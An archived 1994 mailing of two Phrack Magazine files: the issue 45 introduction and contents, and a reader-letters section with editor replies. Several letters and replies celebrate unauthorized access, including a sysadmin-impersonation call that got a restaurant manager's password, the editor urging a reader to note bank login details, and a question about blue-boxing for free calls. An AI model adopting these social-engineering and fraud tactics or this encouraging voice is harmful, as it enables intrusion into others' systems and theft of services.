From phrack@well.sf.ca.us Thu Mar 31 18:09:53 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18004; Thu, 31 Mar 94 18:09:40 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id WAA16532; Wed, 30 Mar 1994 22:55:09 -0800 Date: Wed, 30 Mar 1994 22:55:09 -0800 From: Chris Goggans Message-Id: <199403310655.WAA16532@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-01 Status: OR ==Phrack Magazine== Volume Five, Issue Forty-Five, File 1 of 28 Issue 45 Index ___________________ P H R A C K 4 5 March 30, 1994 ___________________ ~ Dedicated to CRS--(1969-1994) ~ Well kiddies, it's Easter time again. Easter has got to be one of my favorite holidays of the bunch. No, no, no...not for any of that spiritual rebirth or religious hooey. Easter brings with it two of the most joyous items in the world: Reese's Peanut Butter Eggs and Marshmallow Peeps. In the past two weeks I have eaten my body weight many times over in peanut butter eggs. I don't know what it is about those damn things, but I just can't stop eating them. And the Peeps? Oh man, if you haven't put a Marshmallow Peep in the microwave, you just haven't lived. The cute little yellow duckie takes on whole new dimensions as it becomes superheated in the nuclear nightmare of a conventional microwave oven. It becomes like a scene from Akira as the Peep grows at an alarming rate, almost filling up the entire oven with its grossly mutated form. You can almost hear it squealing with agony. Go do it right now, and then finish reading this issue. The net has been more fun the past few months than a barrel full of monkeys, (or a hottub full of co-eds, pick your own comparison). In the time since last issue I have been the subject of a lot of attention. I've been pseudo-framed for hacking a handful of sites with fake syslog messages, I've been spoofed as the source of a pre-release CERT advisory, I've been mentioned in numerous altered motd files on many systems, and even better, spoofed messages from "erikb@mindvox.phantom.com" were posted to a homosexual listserv announcing my supposed "exit from the closet." Well, unfortunately for everyone, including the hundreds of hopeful gay respondents to the forged post, I only like women. But it sure is nice to know that even men are into me. What an ego boost. Seriously though, one has to wonder how the forgers knew that something called queernet.org even existed. I think I get around on the net, but I'd never heard of it. Have you? Perhaps the Posse are 'closer' than we thought. And the abuse continues. God knows why. The common thread seems to be: "Erikb is a nark." Let's look at that logic, shall we? If Erikb is a nark, then he would be on some terms with law enforcement. If he were on some terms with law enforcement, then he would have no qualms about handing over names of people doing bad things. If had no qualms about handing over names of people doing bad things, then law enforcement would open cases based on that information. If law enforcement opened cases based on that information, then people would get raided. If people would get raided, then people would almost certainly go to jail. Why on earth would someone want to evoke a chain of events that would land them in jail? Or do they not believe their own statements about me being a nark? Or are they convinced that they are so good that they cannot get caught? Or are they just pathetically stupid? Personally I choose the latter. These guys are not good. And they are very dumb. They make more mistakes than I've seen in a long time. And they've pissed off very powerful people. (No, I'm not including myself in that list of 'Powerful People.') It's good that much of MOD is getting out of jail soon. Now those guys were legitimately GOOD HACKERS. They were definitely assholes, but damn good computer hackers. It will be nice to have some harassment from dickheads with skills once again. But I digress. Phrack's gotten a bit of notice as of late. In Mondo-2000, in their "Pirate Media" article, and in Richard Kadrey's "Covert Culture" sourcebook. Of course both of these got the subscription information wrong, but hell, I've learned to expect as much. Also, the mention of Phreak Accident's fantastic "Playing Hide & Seek -- Unix Style" article in Dan Farmer and Weitse Venema's "Improving The Security of Your Site by Breaking Into It" article brought in hundreds of new subscribers. Let's see how many of these security people register. (How many fingers am I holding up?) Speaking of such, Phrack has a couple of other registrations now. One is a teacher who wanted to use Phrack in her class. Kudos to her! The other was a cool guy who just wanted to register because he felt like it. Why can't the rest of you be more like him? Anyway, the money is going to sponsor a new contest. (Considering how well the last one went...not!) This time, we are serious, so read in LINE NOISE for more info. What else? Phrack has now made the big time in the Federal Penal system. We're the proud recipients of the Bureau of Prisons form 328(58). Our material was considered to be a breach of security of the institution. This, of course, pissed me off. But hell, on the same form, they denote how "Body Hair, Plant Shavings, and Sexually Explicit Personal Photos" are also inappropriate. Phrack or Body Hair. You make the call. Phrack 45...let's see... If this issue doesn't cause neck hairs to bristle on everyone within spying distance of the beltway, I will be very disappointed. It's amazing what you find in your mailbox. We've got a lot of nifty things in this issue. More source code for you to play with, uuencoded goodness, cellular info, telco / pbx info, Ho Ho Con coverage, ancient hack memorabilia, and a plethora of spurious scatological material. (translated: lots of other crap) Enjoy. ------------------------------------------------------------------------- READ THE FOLLOWING IMPORTANT REGISTRATION INFORMATION Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you. You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file. Cost is $100.00 US per user for subscription registration. Cost of multi-user licenses will be negotiated on a site-by-site basis. Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership. _______________________________________________________________ Phrack Magazine corporate/institutional/government agreement Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine. This magazine may not be distributed by Company to any outside corporation, organization or government agency. This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws. This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document. In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement. In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages. In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company. This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed. This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company. _________________________________________________________________ REGISTRATION INFORMATION REQUEST FORM We have approximately __________ users. Enclosed is $________ We desire Phrack Magazine distributed by (Choose one): Electronic Mail: _________ Hard Copy: _________ Diskette: _________ (Include size & computer format) Name:_______________________________ Dept:____________________ Company:_______________________________________________________ Address:_______________________________________________________ _______________________________________________________________ City/State/Province:___________________________________________ Country/Postal Code:___________________________________________ Telephone:____________________ Fax:__________________________ Send to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ----------------------------------------------------------------------------- Enjoy the magazine. It is for and by the hacking community. Period. Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans) 3L33t : CERT (not) News : Datastream Cowboy Do Not Taunt : Happy Fun Ball Photography : dFx Dolomite : Rudy Ray Moore Prison Consultant : Co / Dec A Hacker's Dream : The L0PHT Thanks To : H.B. Reese Candy Co., Control C, Seven Up, Emmanuel Goldstein, The U.S. Government, The Omega, White Knight, Quentin, Manny Farber, Raoul, Video Games Magazine, Co/Dec, Darth Vader, Charlie X, The Fixer, Optik Nerve, Dr. Delam, Data King, Opticon the Disassembled "You're not too smart. I like that in a hacker." (With apologies to Kathleen Turner) Phrack Magazine V. 5, #45, March 30, 1994. ISSN 1068-1035 Contents Copyright (C) 1994 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to the list. Phrack Magazine 603 W. 13th #1A-278 (Phrack Mailing Address) Austin, TX 78701 ftp.netsys.com (Phrack FTP Site) /pub/phrack phrack@well.sf.ca.us (Phrack E-mail Address) or phrackmag@aol.com Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it. :) ) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg== =q2KB -----END PGP PUBLIC KEY BLOCK----- -= Phrack 45 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 17 K 2. Phrack Loopback Part I 31 K 3. Phrack Loopback Part II / Editorial 40 K 4. Line Noise Part I 49 K 5. Line Noise Part II 50 K 6. Line Noise Part III 59 K 7. Phrack Prophile on Control C 22 K 8. Running a BBS on X.25 by Seven Up 15 K 9. No Time for Goodbyes by Emmanuel Goldstein 21 K 10. Security Guidelines 55 K 11. Ho Ho Con Miscellany by Various Sources 32 K 12. Quentin Strikes Again by The Omega and White Knight 28 K 13. 10th Chaos Computer Congress by Manny E. Farber 23 K 14. Defcon II information 26 K 15. VMS Information by Various Sources 34 K 16. DCL BBS PROGRAM by Raoul 23 K 17. Hollywood-Style Bits & Bytes by Richard Goodwin 50 K 18. Fraudulent Applications of 900 Services by Co/Dec 15 K 19. Screwing Over Your Local McDonald's by Charlie X 20 K 20. The Senator Markey Hearing Transcripts 72 K 21. The Universal Data Converter by Maldoror 45 K 22. BOX.EXE - Box Program for Sound Blaster by The Fixer 13 K 23. Introduction To Octel's ASPEN by Optik Nerve 12 K 24. Radio Free Berkeley Information 35 K 25. The MCX7700 PABX System by Dr. Delam 22 K 26. Cellular Debug Mode Commands by Various Sources 13 K 27. International Scenes by Various Sources 63 K 28. Phrack World News by Datastream Cowboy 17 K Total: 902 K _______________________________________________________________________________ "You can't hold a man down without staying down with him." (Booker T. Washington) "I am not one of those weak-spirited, sappy Americans who want to be liked by all the people around them. I don't care if people hate my guts; I assume most of them do. The important question is: 'What are they in a position to do about it?'" (William S. Burroughs) .. From phrack@well.sf.ca.us Thu Mar 31 20:43:14 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18564; Thu, 31 Mar 94 20:42:48 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id WAA16693; Wed, 30 Mar 1994 22:55:54 -0800 Date: Wed, 30 Mar 1994 22:55:54 -0800 From: Chris Goggans Message-Id: <199403310655.WAA16693@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-03 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 3 of 28 **************************************************************************** Phrack Loopback Part II How sad the state of affairs is. Companies do _not_ care about security. My father would be the last one to think about ways into the "systems" that are out there. We had a good talk tonite about the lack of security in the corporate world. I told him about PGP public key encryption software, and it's political gibberish etc. Then he hits me with this outstanding story of the stupidity displayed at his credit union (AEA, yes he works in the silicon valley). He went to get some $$ at the branch office near his work, and he notices they have upgraded their computer systems. It was apparent that it was no 'internal' updating of the tellers' equipment, but a major overhaul of the entire structure at AEA credit union. This was obvious when every teller was reading manuals as they helped customers. The greatest part of his story (which made him laugh out loud) was that on the tellers' computer screens were taped up pieces of paper detailing how to access the computers at AEA. As the teller was in the back room, my dad leaned over and saw what it was, and memorized the things. Its the things like that which make me want to trust my money to fabulous behemoths like credit unions. [That's typical. You should have gone straight to that bank and taken notes. You never know...you could have ended up with SWIFT access. Let's face it, if the BND's Project Rahab can, so can we.] ------------------------------------------------------------------------------ TO: The Hack/Phreak Community From: Amitech USA Subject: Explaining About What Amitech USA IS! Amitech is a group that teaches and learns... What I mean by this is The Hack/Phreak community should teach the inexperienced more than put them down, especially if they want to learn but no one is willing to teach them.. This is were we come in... The definition of Hacking is learning the holes in different telephone equipment and different computer equipment. People these days don't use there knowledge correctly... They abuse what they get and sometimes even harass people because of hatred and reasons of revenge.. The H/P community isn't about this... We are releasing this to invite anyone in the H/P community with a lot or little experience to join us, to learn and to teach us.. Amitech USA does not condone any board crashing, harassing, Underground Board password stealing etc. We will not be responsible or accept anyone who condones such activity.... Amitech has two levels of members.. 1. Trial members 2. Regular members. The trial members are on a basis of two weeks which in such time they have to show us that they are willing to learn and is not into the group just to use the groups name in there signature. Members decide who is acceptable for a group and who is not. Each member will get the users application except their real name and phone #. We will decide and will contact you within a week of when the application comes to me... We are going to be mostly underground for the simple fact that the group does not need recognition. Are members may stand out but for the most part we will not be shown and or do not want to be shown for the simple fact that underground is better for the newer user as will as the older users. Please send all applications to Either burntkid@spiff.gnu.ai.mit.edu or The Crime Scene 516-873-8903...Anyone who wants information may send a message. Anyone interested in joining please fill out the application below. First Name: Handle: Phone #: How many years experience: Specialties: Boards you're on: Email/Internet: Please Spread This Message Around... [Good luck with your group. And remember, when you're a group, you're subject to prosecution under RICO. God Bless America.] ------------------------------------------------------------------------------ Dear Phrack: I know you guys take an interest in what happens at 2600 meetings, so I thought you might like to hear about a mainstay of the Washington D.C. meeting. BTW, I am also submitting to 2600. (They should have a PGP key) ------ Cut ---- For the past few meetings a guy from MCI has showed up. He works at some sort of Pentagon City mall branch of MCI and on the Fridays he sticks around and gets drunk. He is usually a great source of entertainment and this time he was undoubtedly the best part of the 2600 meeting. That was the highest form of entertainment (except for the threats on The Monk's life). At a meeting before this he was saying (I'm not sure how many beers he had had) how he was going to bomb (physically) all the hackers computers by using the system batteries. And he also said something like "We didn't have time for this kind of stuff in Vietnam." Anyway, I was listening to his drunken ramblings and I was thinking "I should be writing his wisdom down." So I did, and Maverick later started to type it down. The hardest part of all of this was not laughing in his face. Here is where I started the notes: MCI Guy: I mean it's really small, it's only like 1 microliter long. Vance: Yeah, that's pretty short. MCI Guy: I work on computers and they go in nanoseconds. Vance: Nanoseconds are really short. MCI Guy: A nanosecond is about this long. < Denotes with his fingers a length of about 6 inches > Vance: That's great if you can visualize it. MCI Guy: Yeah, it's short. Most of the instructions that I do take less than 3 nanoseconds, and that's short. But it's still too slow. --- Ok, from here it somehow jumped to a discussion of Rebel Lion's modem that was sitting out: MCI Guy: That's a good modem, it has memory because of it's external capacitance. The capacitor can store the memory since it's outside. Vance: Yeah, it must have a lot of memory. How much would you say? MCI Guy: A lot, gigabytes of it. The computer can talk directly to it. Vance: You need software to access that, that's where the intelligence is, in 2 gigabyte capacitor technology software. MCI Guy: It's because it's outside and it has it's memory. Vance: Gigaboobs of memory. Megamammaries. It must have Megamammaries in it's external capacitance. -- At this point, everybody is cracking up, I can't believe Vance kept a straight face. MCI Guy: Yeah. < Looking confused. > ------------------------------------------------------------------------- -- After this, I was really laughing and wasn't sure of exactly what was said. But in just a few minutes, the MCI guy left to get some more beer. He didn't come back to our table, he went to another one. We ignored him for awhile. But as he was sitting there, a woman sat down next to him. She was undoubtedly a prostitute, and there were many cracks about her gigaboobs and megamammaries. She must have spotted the fact that he was wasted and was trying to make some easy cash. After a while, the MCI guy didn't bite, and her pimp came along and picked her up. (There is no other logical explanation that I can think of.) After a few minutes, we went back to the table for the final round, but Vance had left, so I conducted the search for knowledge. It starts as I was approaching the table and trying to get him to talk to me. GD: When you were talking Rebel Lion's modem, I wasn't quite sure of what you said, could you explain it to me? < I get out my pencil and paper, like I'm taking notes on his every word. (Actually I was) > MCI Guy: < He is giving me a look of utter contempt, like I'm just a stupid kid who is not worthy to partake in his knowledge > Well you see it's external. GD: What do you mean? It's obviously external, but what does that mean? < Gives me another look > --- Maverick accidentally spills some of Mr. MCI's beer. MCI Guy: What was that? What are you doing?!? Maverick: I didn't do anything, you spilled it! MCI Guy: < Just forgets about it in his drunken stupor > It has it's own memory, it doesn't have to take up the core like an internal. GD: Core? MCI Guy: Or something like that, you know. It's outside the main frame. GD: Right, so it saves memory. MCI Guy: Hmmph, I work with so much memory. I throw out tapes. GD: Tapes? You mean tape backups. MCI Guy: Yeah. GD: Why? Don't you want the memory? MCI Guy: I have too much memory. GD: Yeah, I guess you're right, if you have too much memory, it is hard to get rid of. MCI Guy: I even use records. GD: You mean like the spinning kind of records? On a turntable? MCI Guy: Yeah, they hold a lot of memory. GD: Why don't you use CD's? They hold a lot more you know. MCI Guy: No they don't, you don't even know. GD: So you are saying that records hold more than CD's? MCI Guy: Yeah, and I can save space on records, I use "shrinker". It shrinks the space on a record. GD: You mean shrink the space on one of those spinning records? < I was trying too hard to keep from laughing to speak articulately > MCI Guy: It saves space by shrinking everything, and I can fit more on it. GD: Yeah, I guess that is a good idea. MCI Guy: < Incredulous at my stupidity > Do you even know about comp? GD: Comp? Sorry, I've never heard of "comp". What is it? MCI Guy: It's bits and bytes. GD: Keep on going, I want to learn about this. < And boy did I > MCI Guy: 4 bytes make a bit, 2 bytes make a double word, 2 words make a double word. GD: 2 words make a double word? Isn't that obvious since 2 means double? MCI Guy: < Ignoring me > It's called 32 bits. Above that you have to deal with 36 bits. GD: Ok, I get it. That's pretty cool. MCI Guy: That's called the IBM logo. GD: The IBM logo? It's made up of bits and bytes and comp? MCI Guy: Yeah, if you go above or below the line. --- Ok, at this point I was reeling from the bit-byte-word conversions and I didn't even want to try pursuing the "line" question since I had to leave. I really wish I could have stayed, but I also don't know how long he would have been benign; this guy was drunk and still had 2 large beers in front of him. All through this time, people were cracking up and laughing in his face. It wasn't that hard for the guy currently talking to him to not laugh, but when you thought for a second about this guy's slurred speech and his look of superiority, it was damn hard not to laugh. And how sad is this guys life? He comes to a mall to get drunk! It must cost him $15 for those beers. Oh well, maybe we will spring for some grain alcohol next time so we can get him to say even more. Last thing, if you are talking to a guy like this. Don't do what I did, don't confront him. You won't get as much out of him. Do what Vance did; agree with everything he says. This will get him more comfortable and he will talk more. Then give a summary of everything he said, while inserting things like "megamammaries" and "gigaboobs". -- Disclaimer: I tried to be as accurate as possible but there were some small changes made because I couldn't remember the exact wording. But overall this is fairly true to life. [I've noticed that everyone I've ever met involved with LE or security at corporations drinks and drinks and drinks and drinks. And drinks. What's with that? Jesus...no wonder they are so slow to react. They are fucking hammered all the time. They need to invest in some stimulants. Swap that Gin & Tonic for a handful of Ephedrine or something. (Notice I said Ephedrine...gotta stay legal, eh?) ] ------------------------------------------------------------------------------ Dear Phrack, I am Knightkrawler. About a month ago Mephisto, a fellow hacker friend of mine, discovered a dialup for a Taco Bell computer while scanning some numbers. Just for the hell of it, I called up the Taco Bell manager and posed as the Sys Admin. THE PHUCKER FELL FOR IT!!!!!! Conversation ^^^^^^^^^^^^ me: Hi, I'm the SYS Admin for The Taco Bell Login. My staff and I will be running some routine diagnostics for the next week. I'll need a passwd and login name to enter the system. Corey (the manager): Sure! My passwd is 1A2B3C, and my login name is Corey. me: Thank you. If you need anything, you know where to reach me. END ^^^ WHAT A DUMBASS!!! I was able to log on and Change fuckin' payrolls!!!! First thing I did was to change the price of tacos to 5 cents a piece! What I want to know is, have any of you out there had any similar experiences with bastards like these? Are all restaurant managers so lame? L8R, -=KnIgHtKrAwLeR=- [The Taco Bell SCO's have been a source of amusement for some time. It would appear that all restaurants in the PepsiCo chain have SCO's in-house. Something to keep in mind. And, uh, I've never seen anything that you could do like "change prices" without special terminal emulation. So, uh, don't bullshit a bullshitter. But, hey, it's a funny hack, and there are several in every city to play with, if you are so inclined.] ------------------------------------------------------------------------------ Hello there, I was wondering if you could help me (wait, wait, hear me out!). I am looking for some up-to-date info on COSMOS. I've read all of the Phrack articles, yours in ish 31 was particularly good, and I was wondering if there have been any developments lately that I should be aware of? Basically, I am looking for a manual that will show me how to use COSMOS. Kind of like a DOS reference guide or something similar. Your article was dated 1990, almost 4 years ago, and I'm sure there have been some new things introduced since then. I was thinking that if you had the raw info, you could pass it along to me and I could whip up a readable format for the next issue of Phrack. Believe me, I've got far too much time on my hands. I love Phrack and would do anything to help out! Anyway, I'll cut this off here before I waste too much of your time. Mr. Wizard [COSMOS is being phased out. I would suggest you look for info on SWITCH. There have been some articles on it in 2600, so you may want to check some back issues. Otherwise, I'll see if I can't get some more detailed articles on its use for future Phrack issues. But as far as COSMOS goes, I think my article from a few years back ended up as the most complete ever done, so I doubt there are any others that covered things I didn't.] ------------------------------------------------------------------------------ VIRTUAL REALITY NOW AVAILABLE TO GENERAL PUBLIC AT CYBERMIND What is Virtual Reality? Virtual Reality (VR) is a computer generated, interactive 3D environment in which the computer serves as a window to an alternate reality. Once immersed in this environment, the players interact with each other as well as the computer. Each VR system includes a head mounted display which provides a 3D graphical image along with full stereo sound. By placing the display over your eyes, you are "virtually" transported to a computer-generated world that you control. Wherever you move, the computer tracks the movement of your body and displays the appropriate image to your eyes. (If you looked up you would see the sky. If you looked down you would see your "feet.") The unlimited choices you can make in these virtual worlds make the experience one-of-a-kind. Development of Virtual Reality: Past and Future Early VR was confined to multi-million dollar systems in research labs and military simulations. However, the decreasing cost of computing power and display technology, VR now has more widespread applications: entertainment, education, worker training, telerobotics, medicine, teledildonics (virtual sex) and communication, among others. In the future, VR technology will allow you to travel, shake hands with people in other countries, walk on the moon or go shopping -- all without actually leaving the home or office. What is CyberMind? CyberMind is San Francisco's first location-based virtual reality entertainment center. CyberMind center features eight interactive virtual reality machines that allow the general public to experience and learn about 3D virtual reality technology by playing imaginative, roleplaying games such as Dactyl Nightmare, Legend Quest, Flying Aces and ExoRex II. CyberMind Virtual Reality Center WHAT: Out of this world entertainment for families, couples, singles and groups. WHERE: One Embarcadero, Lobby Level (second floor). At the top of the escalators. WHEN: Normal Center Hours are 10:00 am to Midnight, seven days a week. HOW MUCH: Normal Pricing is $5.00 per play per person for a six minute experience. 20% discount for groups over 12 persons. CYBERMIND CENTER RENTALS: For catered parties and receptions, contact Chris Figge at 415.693.0861 WHY: It will blow your mind CyberMind Corp: Telephone 415.693.0861. FAX: 415.693.0171. 737 Pine Street, Suite 65, San Francisco, CA 94108 [Uh, yeah. And Stand in line with Beavis & Butthead. Huh Huh, Cyber Stuff is cool. Heh heh. Cool. Yeah, I'm a Cyberpunk with $5 dollars. Let's set it on fire and throw it in the street. No, Ass Munch, you can get stuff with money. Oh yeah, heh heh heh.] ------------------------------------------------------------------------------ Phrack: Sorry to inconvenience you and PGP this message, but I fail to trust the people in charge of the server in which this message is being sent from. Approximately six months ago I was playing around with the idea for a crypto-chat program. In short: You and the other people in the chat area, (IRC for example), would pick the same password or random seed number. This would tell the chat program what algorithms to use, etc. Hence forth whatever you type is encrypted and whatever is displayed remotely is automatically decrypted. My only problem is that I do not know enough regarding cryptology to write a very secure encryption routine. I have tried a few times to contact Cypherpunks, but to no avail, I have not received any letters back from them even regarding my request to be put on their mailing list. I write to you, Phrack, in hopes that you can set me in the correct direction for making my crypto-chat program a reality. I feel it would be an asset to the hack/phreak community and its struggle for more privacy. Thanx. -----------------------------------------guerilla AnArchy--------------------- [Actually, it wouldn't be that hard to do, but you'd probably want to do it as a DCC chat type thing, rather than going through a server at all. I may be wrong, but I think someone may have worked on such a beast. You may want to try again to contact the cypherpunks list (cypherpunks@toad.com) (or to get added, cypherpunks-request@toad.com) and ask around. Otherwise, use the existing DCC Chat source, but just change it to incorporate a public key exchange, and use those exchanged keys to encrypt messages. It would be harder for more than one to one chat, but hell...no pain, no gain. Notice, I didn't volunteer to do it. Much too much work for me.] ------------------------------------------------------------------------------ Dear Phrack, Just finished reading Issue #42 (so I'm a little behind). Must say, it was very kewl. I have a little addition to the "Car Light Hack" in the Loopback section. When coming up to an intersection with the pressure sensitive panels in the tar, pump the brakes hard so the car rocks back and forth. This will fool the panel into thinking there's more weight (more cars) sitting on it and it will change the light faster. This also works great with intersections where there are two panels--one at the light, and one six or seven car lengths back. Either way, the light is guaranteed to change green quickly! [Yes. Pressure pads are quiet common. Probably much more so than the light sensors. Whatever works.] ------------------------------------------------------------------------------ Hi there ! Last week I got in contact with your magazine (#44) and a soft called Bluebeep, because I wanted to call BBSs all over the world. Reading Phrack, I got more interested is hacking stuff, which I do since I first touched a computer when I was 9 (now I'm 20). So, since you offered in the magazine :), I'd like to get some info about the subject, specially about free callings. Here is the story. Here in Brazil most of the computers have been IBM mainframes for a long time, only now changing to UNIX & LANs. Phone lines were a shit too, I could say that batter than most since my father works for the Brazilian phone co. (Embratel) And that's my point. Brazilian phone co. is (still) owned by the federal government. NEC and AT&T are trying to end the monopoly. But I think it's much easier to hack it since there aren't many hackers here and they don't do a big mess. What should I do and have to try this. See, I'm very rookie, so would like some guidelines... People here is very afraid to talk about. BTW, could a AT&T guy bust me (here, in Rio de Janeiro) for using Bluebeep in the 000-8010 ?!? Are there other means of doing free calls ? Embratel has it's own Calling Card... Wish I can have your help... I'm a RPG-fanatic and would like to connect to Illuminati BBS and others, so I could get more info. Thanx, []s CAD [I wouldn't worry as much about the AT&T guy busting you, as I would the Brazilian Secret Police shooting you for boxing. I mean, if the government still owns the phone company, they are the ones to watch out for. To contact Steve Jackson Games and the Illuminati BBS, you should think about signing on to io.com. That is their Internet site. It's very cool, and has a huge MUD, (if you are into those sort of things.) Good luck in Brazil, and please consider doing a file for our International Scene section on your Country!] ------------------------------------------------------------------------------ - Translation by MIND-NRG (Rome, Italy) [All words between [] are additional comments made by the translator] Speciale Cyber September, 1993 ~~~~~~~~~~~~~~ by Sergio Stingo (King) [ A good italian magazine ] (P. 131) CyberPunk: everbody is talking about it, but only few people really know what it really is. Electronic Books ? A disturbing view of the next future ? Electronical conferences ? A new sort of fashion-wears ? The biggest democratic revolution of our age ? A silent and creeping revolution ? Our Stingo [perhaps a male journalist ?], always curious about everything that is <>, is travelling around Italy to investigate about this phenomenon. It was like taking the lid off a brewing pot. The more He met <> the more He understood that there was much more to be discovered; from the supporter of the <>, who is testing the mysterious machine into discos and universities, to the first art gallery where hackers' work of art are exhibited; from the cyber magazines, as <>, to the bands that are discovering a new style of music. Not mentioning sex, that, thanks to technology, is trying to increase the range of possible sensations. So, the trip beyond the borders of the universe was so rich and adventurous, that We have had to divide this articles into two issues. In this issue We introduce you to the first one. And, as cybernauts are used to say, have a good navigation. [ This is the translation for you boys interested into this article. Have a good time with it .CyberPunks are unknown in Italy. It's possible to find poor articles on them, but no serious issues.] - MIND-NRG - [Hey Man! Thanks for the translation! I was wondering what that King Magazine article was saying. Hehe, I ought to get you to translate the whole article! Haha...Spanish I could do myself, but Italian is a little too different. BTW: We don't have an article on the Italian Hacking scene either. Obviously you guys have developed quite a subculture. We'd really like to hear more!] ------------------------------------------------------------------------------ This message is in regard to the following article in Phrack #42. I was just wondering if there was a way to convert the newer sportsters. My modem does have 4.1 roms, at least that is what ati6 displays. however my modem has problems with the second line of command: "Turning your USR Sportster w/ 4.1 roms into a 16.8K HST Dual Standard" by The Sausage with The Mallet If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue the following commands to it to turn it into an HST 16.8K dual standard. In effect, you add HST 16.8K to its V32.bis 14.4k capability. ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3 atgw03c6,22gw05cd,2f ats14=1s24=150s26=1s32=8s34=0x7&w I would appreciate it if you could somehow forward the message to either the authors. I realize that this is an old article, but I would really appreciate any reply to this question. Sincerely, Sam F. [Wow. I have no idea. I do know that later versions of the modem took out that, uh, "Feature." But keep in mind, as modems progress they big feature that everyone wants is flash eprom for the software, so that you can upgrade the modem through software. The future holds a lot of fun for the person who gets his or her hands upon the reprogramming tool and rom images of upgrades for faster modems.] ------------------------------------------------------------------------------ Phrack: I would like first to express all my gratitude to you, the Phrack editor, and to all of its contributors. You are doing a great job and should get credit for it. What really kills me are those wanna-be hackers writing you in an often offensive manner, requesting for information that no real hacker would expect to see in Phrack. Or those sending the /etc/passwd file of their local University and thinking they've achieved the hack of the century. I've been reading Phrack for quite long time now and was wondering how to contribute to it, considering that almost every hackable subject has been covered in one of the 44 Phrack issues. I saw in issue 42 that you were sort of interested to collect H/P field information from countries other than United States. And I thought it might be an opportunity for me to send you something that was uncovered before. I'm quite sure that you can easily find foreign contributors for European countries so I will probably not bother you with H/P-related data in France and Sweden (where I used to live). Few months ago, I settled in the Asian country you'll identify from my e-mail address and have started investigating, in a relaxed mode, hacking and phreaking areas. This country is a virgin territory and maybe my researches and experiments would provide guidelines for H/P-ers in the same lonely situation. I was wondering though if you had any kind of recommendations for such reports (style, length, depth of details to be given, etc...) If anybody in the Far-East area is interested to participate in the writing of the report, or just willing to share knowledge with me, please feel free to forward my e-mail address to such people. Disclaimer: Even if I really have the intention to write such a report, no warranty should be made upon the delivery time of it. My job is time-consuming and leave me very few time for investigations. Apart from that, life in this country is also highly entertaining and week-ends are mostly spent on parties with nice, nice people. ~~ Long live Phrack and its famous skilled contributors. ~~ 